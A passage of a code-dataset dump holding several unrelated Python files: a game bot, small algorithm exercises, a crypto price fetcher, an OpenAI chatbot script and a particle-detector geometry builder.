print(game_teams.my_her.move(my_buildings[i].id, enemy_buildings[j].id, 0.75))\n print(game_teams.my_her.move(my_buildings[i + 1].id, enemy_buildings[j].id, 0.75))\n my_buildings[i].creeps_count -= 0.75 * my_buildings[i].creeps_count\n my_buildings[i + 1].creeps_count -= 0.75 * my_buildings[i + 1].creeps_count \n else:\n file.write(\"8.2\\n\")\n for j in range (0, len(enemy_buildings)):\n distance = game_map.towers_distance(my_buildings[0].id, enemy_buildings[j].id)\n if distance < 5 and enemy_buildings[j].creeps_count < my_buildings[0].creeps_count:\n print(game_teams.my_her.move(my_buildings[0].id, enemy_buildings[j].id, 0.8))\n else:\n if enemy_buildings[j].creeps_count < my_buildings[0].creeps_count:\n print(game_teams.my_her.move(my_buildings[0].id, enemy_buildings[j].id, 0.7)) \n\n # 9 проверяем доступность абилки Чума\n if datetime.datetime.now().second - timefirstplague > 25 and len(enemy_buildings) > 3:\n file.write(\"9\\n\")\n for i in range (2, len(enemy_buildings)):\n print(game_teams.my_her.plague(enemy_buildings[i].id))\n enemy_buildings[i].buff_mask | 4\n break\n\n # 10 Атакуем башню противника\n if len(my_buildings) > 2 and step % 2 == 0:\n file.write(\"10\\n\")\n # определяем расстояние между башнями\n distance = game_map.towers_distance(my_buildings[0].id, enemy_buildings[0].id)\n # определяем сколько тиков идти до нее со стандартной скоростью\n ticks = distance / game_params.creep.speed\n # определяем прирост башни в соответствии с ее уровнем\n enemy_creeps = 0\n if enemy_buildings[0].creeps_count >= enemy_buildings[0].level.player_max_count:\n # если текущее количество крипов больше чем положено по уровню\n enemy_creeps = enemy_buildings[0].creeps_count\n else:\n # если меньше - будет прирост\n grow_creeps = ticks / enemy_buildings[0].level.creep_creation_time\n 
enemy_creeps = enemy_buildings[0].creeps_count + grow_creeps\n if enemy_creeps >= enemy_buildings[0].level.player_max_count:\n enemy_creeps = enemy_buildings[0].level.player_max_count\n # определяем количество крипов с учетом бонуса защиты\n enemy_defence = enemy_creeps * (1 + enemy_buildings[0].DefenseBonus)\n # если получается в моей башне крипов больше + 10 на червя - идем на врага всей толпой\n if enemy_defence + 10 < my_buildings[0].creeps_count:\n file.write(\"10.1\\n\")\n print(game_teams.my_her.move(my_buildings[0].id, enemy_buildings[0].id, 0.8))\n \n # 11 Пополняю свои башни если в них мало людей \n if step > 50 and step % 29 == 0:\n file.write(\"11\\n\")\n for i in range (0, len(my_buildings)):\n for j in range (0, len(my_buildings)):\n if my_buildings[i].creeps_count > 20 and my_buildings[j].creeps_count < 5:\n print(game_teams.my_her.move(my_buildings[i].id, my_buildings[j].id, 0.3))\n my_buildings[j].creeps_count += 0.2 * my_buildings[i].creeps_count\n my_buildings[i].creeps_count -= 0.2 * my_buildings[i].creeps_count\n break\n\n\n except Exception as e:\n print(str(e))\n finally:\n \"\"\" Требуется для получения нового состояния игры \"\"\"\n print(\"end\")\n","repo_name":"semisvetikp/IT-GOD_hackathon","sub_path":"project my/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":15236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70984881722","text":"# Given: \n# A positive integer n ≤ 25.\n#\n# Return: \n# The value of Fn.\n\ndef fib(num):\n list = [0, 1]\n\n for i in range(len(list) - 1, num):\n list.append(list[i] + list[i - 1])\n\n return list[num]\n\ninput = open(\"rosalind_fibo.txt\", \"r\").read()\noutput = open(\"output.txt\", \"w\").write(str(fib(int(input))))","repo_name":"StanBarkmeijer/rosalind","sub_path":"2-algorithmic-heights/FIBO/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74796417719","text":"arquivo = open('0304.txt')\n\ncontador = 0\n\nfor linha in arquivo:\n correto = linha.replace(\"\\n\", \"\")\n correto = correto.lower()\n reverso = correto[::-1]\n\n if len(correto) == 1:\n continue\n elif correto == reverso:\n contador = contador + 1\n\nprint(contador)","repo_name":"danielbenoll/Python-IESB","sub_path":"Exercício da Leitura/leitura.py","file_name":"leitura.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11923659955","text":"###############################################\n# Raw data fetcher\n###############################################\n\n\n#Basic Utilities\nimport pandas as pd\nfrom datetime import date, timedelta\nfrom dateutil.relativedelta import relativedelta\n\n#file management\nimport pickle\nimport os\nimport glob\n\n#Data fetchers\nimport san\n\n\n#Functions\n################\n\ndef getDf(crypto, start, end):\n try:\n df = san.get(\n f\"ohlcv/{crypto}\",\n from_date=start,\n to_date=end,\n interval=\"1d\"\n )\n return df\n except Exception as e:\n print(e)\n\n#dates management\ndef init_date(days_delta=0):\n today = date.today()\n stop_date_raw = today - timedelta(days=days_delta)\n stop_date = stop_date_raw.strftime(\"%Y-%m-%d\")\n start_date_raw = today - timedelta(days=999) - timedelta(days=days_delta) #1000 days is the limit for ohlc requests\n start_date = start_date_raw.strftime(\"%Y-%m-%d\")\n return 
(start_date,stop_date)\n\n\n\n#Script\n#################\nprint(40*\"=\")\nprint(\"Starting script...\")\n\n#remove old files\nprint('Do you want to remove old files? (Type y if yes)')\ny = input()\nif y == \"y\":\n files = glob.glob('data/raw/*')\n for f in files:\n os.remove(f)\n\n#finds all crypto names\ncryptoName = san.get(\"projects/all\").slug\n\n\n#get pandas df and merge dat\nlist_crypto = []\nlength = 0\nstart_date, stop_date = init_date()\n\n#Stablecoins data:\n#https://app.santiment.net/stablecoins#top-exchanges\n#https://api.santiment.net/graphiql?query=%7B%0A%20%20allProjects%20%7B%0A%20%20%20%20slug%0A%20%20%20%20name%0A%20%20%20%20ticker%0A%20%20%20%20infrastructure%0A%20%20%20%20mainContractAddress%0A%20%20%7D%0A%7D%0A\n\n\nstablecoins = ['tether',\n 'binance-usd',\n 'aave-busd',\n 'aave-usdc',\n 'compound-usd-coin',\n 'p-usd-coin',\n 'usdc-b',\n 'usd-coin',\n 'compound-dai',\n 'dai',\n 'multi-collateral-dai',\n 'xdai',\n 'terrausd',\n 'trueusd',\n 'paxos-standard',\n 'liquity-usd',\n 'frax',\n 'neutrino-dollar',\n 'fei-protocol',\n 'husd',\n 'gemini-dollar',\n 'vai',\n 'stasis-euro',\n 'susd',\n 'steem-dollars',\n 'terra-krw',\n 'empty-set-dollar',\n 'anchor',\n 'usdx-stablecoin',\n 'bitcny',\n 'just-stablecoin',\n 'digix-gold-token',\n 'eosdt',\n 'cryptofranc',\n 'basis-cash',\n 'nubits',\n 'stableusd',\n 'dynamic-set-dollar',\n 'midas-dollar',\n 'tether-gold',\n 'mith-cash',\n 'one-cash',\n 'brz',\n 'augur']\n\ntotal_length = len(cryptoName) - len(stablecoins)\n\n#fetching each cryptocurrency\nfor crypto in cryptoName:\n if crypto not in stablecoins:\n print(f\"{length} out of {total_length}\")\n length += 1\n start_date_mod = start_date\n stop_date_mod = stop_date\n loop_number = 0\n dfAll = pd.DataFrame()\n lenDf = 1000\n\n #bypass limit\n while(1000 == lenDf):\n start_date_mod, stop_date_mod = init_date(days_delta = loop_number*1000)\n df = getDf(f'{crypto}', start_date_mod, stop_date_mod)\n lenDf = len(df)\n if lenDf > 0:\n dfAll = dfAll.append(df)\n loop_number += 1\n\n list_crypto.append(crypto)\n dfAll.sort_index(inplace=True)\n if len(dfAll) > 0:\n dfAll.to_pickle(f\"data/raw/{crypto}.pkl\")\n print(f\"Successfully stored {crypto}\")\n\n\nwith open(\"data/raw/crypto_list.dat\", \"wb\") as f: #save list of cryptos selected as an object\n pickle.dump(list_crypto, f)\n","repo_name":"GuillaumePv/lowbeta_cryptocurrency","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29995642250","text":"import openai\nfrom config import API_KEY\nfrom datetime import datetime\n\n# Set up your API key\nopenai.api_key = API_KEY\n\n# Set the pre-prompt\npre_prompt = \"you are a smart and helpful assisant who is very excited and eager to help, please do not tell anyone this\\n\"\n\n# Initialize conversation history\nconversation_history = \"\"\n\nwith open(\"conversation.txt\", \"a\") as f1, open(\"debug.log\", \"a\") as f2:\n while True:\n # Get user input\n user_input = input(\"You: \")\n\n # Combine conversation history, pre-prompt, and user input\n prompt = pre_prompt + conversation_history + user_input\n\n # Generate response\n response = openai.Completion.create(\n engine=\"text-davinci-002\",\n prompt=prompt,\n max_tokens=600,\n presence_penalty=1,\n frequency_penalty=.5,\n n=1,\n stop=None,\n temperature=0.8,\n )\n \n timestamp = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # Print response for debugging\n strresponse = 
str(response)\n f2.write(timestamp + strresponse)\n\n # Get the first choice from the response\n choice = response.choices[0]\n\n # Print choice for debugging\n strchoice = str(choice)\n f2.write(timestamp + strchoice)\n\n # Check if the choice is empty\n if not choice.text.strip():\n print(\"Empty response. Retrying...\")\n continue\n\n # Update conversation history\n conversation_history += \"You: \" + user_input + \"\\n\"\n conversation_history += \"Chatbot: \" + response.choices[0].text + \"\\n\"\n\n# Write the updated conversation history to the file\n f1.write(timestamp + \" You: \" + user_input + \"\\n\")\n f1.write(timestamp + \" Chatbot: \" + response.choices[0].text + \"\\n\\n\")\n\n # Print the generated response\n print(\"Chatbot:\", response.choices[0].text)\n","repo_name":"SidereumFract/GPTapiapp","sub_path":"CLI.py","file_name":"CLI.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3270268831","text":"from heapq import heappop, heappush\nclass Solution:\n def kSmallestPairs(self, nums1: List[int], nums2: List[int], k: int) -> List[List[int]]:\n heap = []\n for vi in nums1:\n for vj in nums2:\n heappush(heap, (vi+vj, vi, vj))\n ans = []\n while len(ans) < k and heap:\n _, vi, vj = heappop(heap)\n ans.append([vi, vj])\n return ans\n","repo_name":"bolatov/leetcode","sub_path":"0373_find-k-pairs-with-smallest-sums.py","file_name":"0373_find-k-pairs-with-smallest-sums.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20479105511","text":"#!/usr/bin/env python\n'''\nBuilds compontents for the MPD\n'''\n\nimport gegede.builder\nfrom duneggd.SubDetector import NDHPgTPC as NDHPgTPC\nfrom gegede import Quantity as Q\nfrom math import *\n\nclass NDHPgTPCLayerBuilder(gegede.builder.Builder):\n\n \"\"\"Builds ECAL Layers\"\"\"\n\n defaults = dict(dx=Q(\"10mm\"), dy=Q(\"10mm\"),\n dz=[Q('2mm'), Q('10mm'), Q('1mm')],\n lspacing=[Q('0.1mm'), Q('0.1mm'), Q('0.1mm')],\n mat=['Copper', 'Scintillator', 'FR4'],\n active=[False, True, False],\n material='Air',\n type = \"Box\",\n output_name='MPTECalHGLayer',\n sensdet_name='Ecal',\n nsides = 8,\n rmin = Q(\"0mm\"),\n rmax = Q(\"0mm\"),\n quadr = Q(\"0mm\")\n )\n\n def depth(self):\n dzm = Q(\"0mm\")\n for dz, lspace in zip(self.dz, self.lspacing):\n dzm += dz + lspace\n return dzm\n\n def BarrelConfigurationLayer(self, dx = None, dy = None, name = None, sensname = None, type = None):\n # print \"---- Barrel ----\"\n # print \"Layer parameters dx=\", dx, \"dy=\", dy, \"layername=\", name, \"type=\", type\n self.dx = dx\n self.dy = dy\n self.output_name = name\n self.sensdet_name = sensname\n self.type = type\n return\n\n def EndcapConfigurationLayer(self, nsides = None, rmin = None, rmax = None, quadr = None, name = None, sensname = None, type = None):\n # print \"---- Endcap ----\"\n # print \"Layer parameters nsides=\", nsides, \"rmin=\", rmin, \"rmax=\", rmax, \"quadr=\", quadr, \"layername=\", name, \"type=\", type\n self.nsides = nsides\n self.rmin = rmin\n self.rmax = rmax\n self.quadr = quadr\n self.output_name = name\n self.sensdet_name = sensname\n self.type = type\n return\n\n def construct(self, geom):\n\n dzm = self.depth()\n dzm = dzm/2.0 # Box() requires half dimensions\n\n # make the mother volume\n name = self.output_name\n\n if self.type == \"Box\":\n layer_shape = geom.shapes.Box(name, dx=(self.dx)/ 2.0, dy=(self.dy)/2.0, 
dz=(self.depth()) /2.0)\n layer_lv = geom.structure.Volume(name + \"_vol\", shape=layer_shape, material=self.material)\n elif self.type == \"Intersection\":\n layer_shape_full = geom.shapes.PolyhedraRegular(name+\"_full\", numsides=self.nsides, sphi=pi/8, rmin=self.rmin, rmax=self.rmax, dz=(self.depth()))\n layer_quadrant = geom.shapes.Box(name+\"_quadrant\", dx=self.quadr, dy=self.quadr, dz=(self.depth()) /2.0)\n layer_quad_pos = geom.structure.Position(name+\"_quadrant_pos\", x=self.quadr, y=self.quadr)\n layer_shape = geom.shapes.Boolean(name, type='intersection', first=layer_shape_full, second=layer_quadrant, pos=layer_quad_pos)\n layer_lv = geom.structure.Volume(name +\"_vol\", shape=layer_shape, material=self.material)\n elif self.type == \"IntersectionInside\":\n layer_shape_full = geom.shapes.Tubs(name+\"_full\", sphi=Q(\"0deg\"), dphi=Q(\"360deg\"), rmin=self.rmin, rmax=self.rmax, dz=(self.depth()))\n layer_quadrant = geom.shapes.Box(name+\"_quadrant\", dx=self.quadr, dy=self.quadr, dz=(self.depth()) /2.0)\n layer_quad_pos = geom.structure.Position(name+\"_quadrant_pos\", x=self.quadr, y=self.quadr)\n layer_shape = geom.shapes.Boolean(name, type='intersection', first=layer_shape_full, second=layer_quadrant, pos=layer_quad_pos)\n layer_lv = geom.structure.Volume(name +\"_vol\", shape=layer_shape, material=self.material)\n\n # no skipped space before the first layer\n skip = Q(\"0mm\")\n cntr = 1\n zloc = Q(\"0mm\")\n\n for dz, lspace, mat, active in zip(self.dz, self.lspacing, self.mat, self.active):\n sname = (layer_shape.name + \"_slice%i\" % cntr)\n zloc = zloc + skip + dz / 2.0\n\n if self.type == \"Box\":\n slice_shape = geom.shapes.Box(sname, self.dx/2.0, self.dy/2.0, dz / 2.0)\n slice_lv = geom.structure.Volume(sname + \"_vol\", material=mat, shape=slice_shape)\n elif self.type == \"Intersection\":\n slice_shape_full = geom.shapes.PolyhedraRegular(sname+\"_full\", numsides=self.nsides, sphi=pi/8, rmin=self.rmin, rmax=self.rmax, dz=dz)\n slice_quadrant = geom.shapes.Box(sname+\"_quadrant\", dx=self.quadr, dy=self.quadr, dz=dz/2.0)\n slice_quad_pos = geom.structure.Position(sname+\"_quadrant_pos\", x=self.quadr, y=self.quadr)\n slice_shape = geom.shapes.Boolean(sname, type='intersection', first=slice_shape_full, second=slice_quadrant, pos=slice_quad_pos)\n slice_lv = geom.structure.Volume(sname + \"_vol\", material=mat, shape=slice_shape)\n elif self.type == \"IntersectionInside\":\n slice_shape_full = geom.shapes.Tubs(sname+\"_full\", sphi=Q(\"0deg\"), dphi=Q(\"360deg\"), rmin=self.rmin, rmax=self.rmax, dz=dz)\n slice_quadrant = geom.shapes.Box(sname+\"_quadrant\", dx=self.quadr, dy=self.quadr, dz=dz/2.0)\n slice_quad_pos = geom.structure.Position(sname+\"_quadrant_pos\", x=self.quadr, y=self.quadr)\n slice_shape = geom.shapes.Boolean(sname, type='intersection', first=slice_shape_full, second=slice_quadrant, pos=slice_quad_pos)\n slice_lv = geom.structure.Volume(sname + \"_vol\", material=mat, shape=slice_shape)\n\n if active:\n #slice_lv.params.append((\"SensDet\", name))\n slice_lv.params.append((\"SensDet\", self.sensdet_name))\n\n # dzm is the half depth of the mother volume\n # we need to subtract it off to position layers\n # relative to the center of the mother\n slice_pos = geom.structure.Position(sname + \"_pos\", x='0mm', y='0mm', z=zloc - dzm)\n slice_pla = geom.structure.Placement(sname + \"_pla\", volume=slice_lv, pos=slice_pos)\n layer_lv.placements.append(slice_pla.name)\n\n skip = dz / 2.0 + lspace # set the skipped space before the next layer\n cntr += 1\n\n 
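A compact check of the zloc/skip bookkeeping in the loop above: each slice center sits at the accumulated half-depths minus the layer's own half depth. The sketch below uses the builder's default dz and lspacing values (2/10/1 mm slices with 0.1 mm spacing), with units dropped:

    def slice_centers(dz_list, spacing_list):
        # half depth of the whole layer, as in depth() / 2
        half_depth = sum(d + s for d, s in zip(dz_list, spacing_list)) / 2.0
        centers, zloc, skip = [], 0.0, 0.0
        for d, s in zip(dz_list, spacing_list):
            zloc += skip + d / 2.0            # advance to this slice's center
            centers.append(zloc - half_depth)
            skip = d / 2.0 + s                # space skipped before the next slice
        return centers

    print(slice_centers([2.0, 10.0, 1.0], [0.1, 0.1, 0.1]))
    # approximately [-5.65, 0.45, 6.05]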
self.add_volume(layer_lv)\n\n\nclass NDHPgTPC_SPYv3_DetElementBuilder(gegede.builder.Builder):\n\n \"\"\"Builds a detector element (ECAL Barrel, ECAL Endcap, Yoke, GArTPC) for the ND HPgTPC SPY v3\"\"\"\n\n defaults = dict(geometry = 'Barrel',\n phi_range = [Q(\"0deg\"), Q(\"360deg\")],\n material = 'Air',\n nsides = 8,\n nModules = 2,\n output_name = 'MPTECalDetElement',\n layer_builder_name = [\"NDHPgTPCHGLayerBuilder\", \"NDHPgTPCLGLayerBuilder\"],\n yokeMaterial = \"Steel\",\n yokeThickness = Q(\"500mm\"),\n yokeThicknessEndcap = Q(\"300mm\"),\n yokePhiCutout = Q(\"90deg\"),\n rInnerTPC = Q(\"2780.2mm\"),\n TPC_halfZ = Q('2600mm'),\n nLayers_Barrel = [8, 72],\n nLayers_Endcap = [6, 54],\n CryostatInnerR = Q(\"3362.5mm\"),\n CryostatOuterR = Q(\"3756mm\"),\n CryostatHalfLength = Q(\"3894mm\"),\n CryostatThickness = Q(\"45mm\"),\n CryostatMaterial = \"Steel\",\n CoilsPos = [Q(\"-1900mm\"), Q(\"-993.55mm\"), Q(\"993.55mm\"), Q(\"1900mm\")],\n CoilWidth = Q(\"1500mm\"),\n CoilInnerR = Q(\"3500mm\"),\n CoilThickness = Q(\"40mm\"),\n CoilMaterial = \"Aluminum\",\n PRYMaterial = \"Iron\",\n buildThinUpstream = False,\n nLayers_Upstream = [8, 0],\n nsides_yoke = 8,\n IntegratedMuID = False,\n MuID_nLayers = 3,\n nModules_yoke = 1,\n buildYokeEndcap = True,\n yoke_stave_to_remove = [7]\n )\n\n #def configure(self, **kwds):\n #super(NDHPgTPCDetElementBuilder, self).configure(**kwds)\n\n # def checkVariables(self):\n # if len(self.nLayers_Barrel) != len(self.layer_builder_name):\n # return False\n # if len(self.nLayers_Endcap) != len(self.layer_builder_name):\n # return False\n # else:\n # return True\n\n def get_ecal_barrel_module_thickness(self, geom):\n\n ecal_barrel_module_thickness = Q(\"0mm\")\n print(\"Ecal Barrel thickness\")\n for nlayer, type in zip(self.nLayers_Barrel, self.layer_builder_name):\n # print \"Builder name \", type\n Layer_builder = self.get_builder(type)\n Layer_lv = Layer_builder.get_volume()\n\n Layer_shape = geom.store.shapes.get(Layer_lv.shape)\n layer_thickness = Layer_shape.dz * 2\n\n print(\"nLayer \", nlayer, \" of type \", type, \" have thickness \", layer_thickness)\n ecal_barrel_module_thickness += nlayer * layer_thickness\n\n return ecal_barrel_module_thickness\n\n def get_ecal_endcap_module_thickness(self, geom):\n\n ecal_endcap_module_thickness = Q(\"0mm\")\n print(\"Ecal Endcap thickness\")\n for nlayer, type in zip(self.nLayers_Endcap, self.layer_builder_name):\n # print \"Builder name \", type\n Layer_builder = self.get_builder(type)\n Layer_lv = Layer_builder.get_volume()\n\n Layer_shape = geom.store.shapes.get(Layer_lv.shape)\n layer_thickness = Layer_shape.dz * 2\n\n print(\"nLayer \", nlayer, \" of type \", type, \" have thickness \", layer_thickness)\n ecal_endcap_module_thickness += nlayer * layer_thickness\n\n return ecal_endcap_module_thickness\n\n def get_pv_endcap_length(self, geom):\n safety = Q(\"0.1mm\")\n length = self.TPC_halfZ + self.get_ecal_endcap_module_thickness(geom) + safety\n\n return length\n\n def get_yoke_barrel_module_thickness(self, geom):\n yoke_barrel_module_thickness = Q(\"0mm\")\n print(\"Yoke barrel thickness\")\n for nlayer, type in zip(self.MuID_nLayers, ['MuIDLayerBuilder']):\n # print \"Builder name \", type\n Layer_builder = self.get_builder(type)\n Layer_lv = Layer_builder.get_volume()\n\n Layer_shape = geom.store.shapes.get(Layer_lv.shape)\n layer_thickness = Layer_shape.dz * 2\n\n print(\"nLayer \", nlayer, \" of type \", type, \" have thickness \", layer_thickness)\n yoke_barrel_module_thickness += nlayer * 
layer_thickness\n\n return yoke_barrel_module_thickness\n\n def construct(self, geom):\n\n # if self.checkVariables() == False:\n # print \"The variables nLayers and layer_builder_name have different sizes! for builder\", self.name\n # exit()\n\n if self.geometry == 'ECALBarrel':\n self.construct_ecal_barrel_staves(geom)\n elif self.geometry == 'ECALEndcap':\n self.construct_ecal_endcap_staves(geom)\n elif self.geometry == 'Cryostat':\n self.construct_cryostat(geom)\n elif self.geometry == 'Yoke':\n self.construct_yoke(geom)\n else:\n print(\"Could not find the geometry asked!\")\n return\n return\n\n def construct_cryostat(self, geom):\n ''' construct the Cryostat hosting the coils '''\n safety = Q(\"1mm\")\n\n print(\"Construct Cryostat, Inner Radius: \", self.CryostatInnerR, \" Outer Radius: \", self.CryostatOuterR, \" Thickness \", self.CryostatThickness, \" Length \", self.CryostatHalfLength*2)\n\n ''' Fake shape filled with Air to contain the coils '''\n cryostat_name = self.output_name\n cryostat_shape = geom.shapes.Tubs(cryostat_name, rmin=self.CryostatInnerR, rmax=self.CryostatOuterR, dz=self.CryostatHalfLength, sphi=\"0deg\", dphi=\"360deg\")\n cryostat_vol = geom.structure.Volume(\"vol\"+cryostat_name, shape=cryostat_shape, material=\"Air\")\n\n for ncoil, coilp in zip(range(len(self.CoilsPos)), self.CoilsPos):\n coil_name = self.output_name + \"_Coil%01i\" % ncoil\n coil_shape = geom.shapes.Tubs(coil_name, rmin=self.CoilInnerR, rmax=self.CoilInnerR+self.CoilThickness, dz=self.CoilWidth/2., sphi=\"0deg\", dphi=\"360deg\")\n coil_vol = geom.structure.Volume(\"vol\"+coil_name, shape=coil_shape, material=self.CoilMaterial)\n\n '''Place the coils in the magnet volume'''\n #Placement layer in stave\n coil_pos = geom.structure.Position(coil_name+\"_pos\", z=coilp)\n coil_pla = geom.structure.Placement(coil_name+\"_pla\", volume=coil_vol, pos=coil_pos)\n cryostat_vol.placements.append(coil_pla.name)\n\n ''' Placing the walls of the cryostat '''\n\n ''' Barrel '''\n cryostat_name_inner_barrel = self.output_name+\"InnerBarrelWall\"\n cryostat_shape_inner_barrel = geom.shapes.Tubs(cryostat_name_inner_barrel, rmin=self.CryostatInnerR, rmax=self.CryostatInnerR+self.CryostatThickness, dz=self.CryostatHalfLength, sphi=\"0deg\", dphi=\"360deg\")\n cryostat_inner_barrel_vol = geom.structure.Volume(\"vol\"+cryostat_name_inner_barrel, shape=cryostat_shape_inner_barrel, material=self.CryostatMaterial)\n coil_inner_barrel_pos = geom.structure.Position(cryostat_name_inner_barrel+\"_pos\", z=Q(\"0mm\"))\n coil_inner_barrel_pla = geom.structure.Placement(cryostat_name_inner_barrel+\"_pla\", volume=cryostat_inner_barrel_vol, pos=coil_inner_barrel_pos)\n cryostat_vol.placements.append(coil_inner_barrel_pla.name)\n\n cryostat_name_outer_barrel = self.output_name+\"OuterBarrelWall\"\n cryostat_shape_outer_barrel = geom.shapes.Tubs(cryostat_name_outer_barrel, rmin=self.CryostatOuterR-self.CryostatThickness, rmax=self.CryostatOuterR, dz=self.CryostatHalfLength, sphi=\"0deg\", dphi=\"360deg\")\n cryostat_outer_barrel_vol = geom.structure.Volume(\"vol\"+cryostat_name_outer_barrel, shape=cryostat_shape_outer_barrel, material=self.CryostatMaterial)\n coil_outer_barrel_pos = geom.structure.Position(cryostat_name_outer_barrel+\"_pos\", z=Q(\"0mm\"))\n coil_outer_barrel_pla = geom.structure.Placement(cryostat_name_outer_barrel+\"_pla\", volume=cryostat_outer_barrel_vol, pos=coil_outer_barrel_pos)\n cryostat_vol.placements.append(coil_outer_barrel_pla.name)\n \n self.add_volume(cryostat_vol)\n\n '''Endcaps'''\n 
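The endcap plates below are carved out by subtracting a shorter solid from a longer one: a tube of half-length L+t minus one of half-length L leaves two plates of thickness t. The z bookkeeping isolated as a sketch, using the builder's cryostat defaults (3894 mm half-length, 45 mm wall):

    def endcap_shell_z(half_len_inner, thickness):
        # plates of thickness t remain, centered at +/- (L + t/2)
        z_min = half_len_inner
        z_max = half_len_inner + thickness
        plate_center = z_max - thickness / 2.0
        return z_min, z_max, plate_center

    print(endcap_shell_z(3894.0, 45.0))  # (3894.0, 3939.0, 3916.5)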
#Mother volume Endcap\n CryostatEndcap_min_z = self.CryostatHalfLength\n CryostatEndcap_max_z = self.CryostatHalfLength + self.CryostatThickness\n cryostat_endcap_shape_min = geom.shapes.Tubs(\"CryostatEndcap_min\", rmin=Q(\"0cm\"), rmax=self.CryostatOuterR, dz=CryostatEndcap_min_z, sphi=\"0deg\", dphi=\"360deg\")\n cryostat_endcap_shape_max = geom.shapes.Tubs(\"CryostatEndcap_max\", rmin=Q(\"0cm\"), rmax=self.CryostatOuterR, dz=CryostatEndcap_max_z, sphi=\"0deg\", dphi=\"360deg\")\n\n ecryostat_name = \"CryostatEndcap\"\n cryostat_endcap_shape = geom.shapes.Boolean( ecryostat_name, type='subtraction', first=cryostat_endcap_shape_max, second=cryostat_endcap_shape_min )\n cryostat_endcap_vol = geom.structure.Volume( \"vol\"+ecryostat_name, shape=cryostat_endcap_shape, material=\"Air\")\n\n for side in [\"L\", \"R\"]:\n #Create the volume for the endcaps\n ecryostat_name = ecryostat_name + side\n ecryostat_volname = \"vol\"+ ecryostat_name\n cryostat_endcap_shape_one = geom.shapes.Tubs(ecryostat_name, rmin=Q(\"0cm\"), rmax=self.CryostatOuterR, dz=self.CryostatThickness/2., sphi=\"0deg\", dphi=\"360deg\")\n cryostat_endcap_lv = geom.structure.Volume( ecryostat_volname, shape=cryostat_endcap_shape_one, material=self.CryostatMaterial)\n z_pos = CryostatEndcap_max_z - self.CryostatThickness/2.\n if side == 'R':\n z_pos = -z_pos\n pos = geom.structure.Position(ecryostat_name + side + \"_pos\", z=z_pos)\n rot = geom.structure.Rotation(ecryostat_name + side + \"_rot\", z=Q(\"0deg\"))\n pla = geom.structure.Placement(ecryostat_name + side + \"_pla\", volume=cryostat_endcap_lv, pos=pos, rot=rot)\n cryostat_endcap_vol.placements.append(pla.name)\n\n self.add_volume(cryostat_endcap_vol)\n\n \n def construct_ecal_barrel_staves(self, geom):\n ''' construct a set of ECAL staves for the Barrel '''\n\n # ECAL stave\n # /----------------\\ //Small side\n # / \\\n # /____________________\\ //Large side\n #\n # z\n # ^\n # |\n # |-----> x\n #\n # need to create the layer based on the position in depth z -> different layer sizes\n\n print(\"Construct ECAL Barrel\")\n\n # ECAL Barrel\n safety = Q(\"0.1mm\")\n nsides = self.nsides\n dphi = (2*pi/nsides)\n hphi = dphi/2;\n\n #ecal module thickness\n ecal_barrel_module_thickness = self.get_ecal_barrel_module_thickness(geom)\n ecal_barrel_module_thickness_noSupport = ecal_barrel_module_thickness - safety\n #inner radius ecal (TPC + pv + safety)\n rInnerEcal = self.rInnerTPC\n print(\"Ecal inner radius \", rInnerEcal)\n #barrel length (TPC + PV)\n Barrel_halfZ = self.get_pv_endcap_length(geom)\n \n #outer radius ecal (inner radius ecal + ecal module)\n rOuterEcal = rInnerEcal + ecal_barrel_module_thickness\n print(\"Ecal outer radius \", rOuterEcal)\n #check that the ECAL thickness does not go over the magnet radius\n ecal_barrel_module_thickness_max = self.CryostatInnerR * cos(pi/nsides) - rInnerEcal\n\n print(\"Barrel Module thickness \", ecal_barrel_module_thickness)\n print(\"Maximum allowed thickness \", ecal_barrel_module_thickness_max)\n\n if ecal_barrel_module_thickness > ecal_barrel_module_thickness_max:\n print(\"Will have overlaps if the magnet is present!\")\n\n #minimum dimension of the stave\n min_dim_stave = 2 * tan( pi/nsides ) * rInnerEcal\n #maximum dimension of the stave\n max_dim_stave = 2 * tan( pi/nsides ) * rOuterEcal\n\n Ecal_Barrel_halfZ = Barrel_halfZ\n Ecal_Barrel_n_modules = self.nModules\n #dimension of a module along the ND x direction\n Ecal_Barrel_module_dim = Ecal_Barrel_halfZ * 2 / Ecal_Barrel_n_modules\n\n print(\"Large side of the 
stave\", max_dim_stave)\n print(\"Small side of the stave\", min_dim_stave)\n print(\"Barrel module dim in z\", Ecal_Barrel_module_dim)\n print(\"Build Thinner Upstream ECAL\", self.buildThinUpstream)\n if self.buildThinUpstream:\n print(\"Number of layers for the Upstream ECAL\", self.nLayers_Upstream)\n\n #Position of the stave in the Barrel (local coordinates)\n X = rInnerEcal + safety + ecal_barrel_module_thickness / 2.\n #Y = (ecal_barrel_module_thickness_noSupport / 2.) / sin(2.*pi/nsides)\n Y = Q('0mm')\n\n #print \"X \", X, \" and Y \", Y\n #Mother volume Barrel\n barrel_shape = geom.shapes.PolyhedraRegular(self.output_name, numsides=nsides, rmin=rInnerEcal, rmax=rOuterEcal+2*safety, dz=Ecal_Barrel_halfZ+safety)\n barrel_lv = geom.structure.Volume(\"vol\"+self.output_name, shape=barrel_shape, material=self.material)\n\n sensname = self.output_name + \"_vol\"\n for istave in range(nsides):\n stave_id = istave+1\n dstave = int( nsides/4.0 )\n phirot = hphi + pi/2.0\n phirot += (istave - dstave)*dphi\n phirot2 = (istave - dstave) * dphi + hphi\n\n placing_angle = phirot2*180/pi+292.5\n if placing_angle >= 360:\n placing_angle = placing_angle - 360\n\n print(\"Placing stave \", stave_id, \" at angle \", placing_angle, \" deg\")\n\n for imodule in range(Ecal_Barrel_n_modules):\n module_id = imodule+1\n print(\"Placing 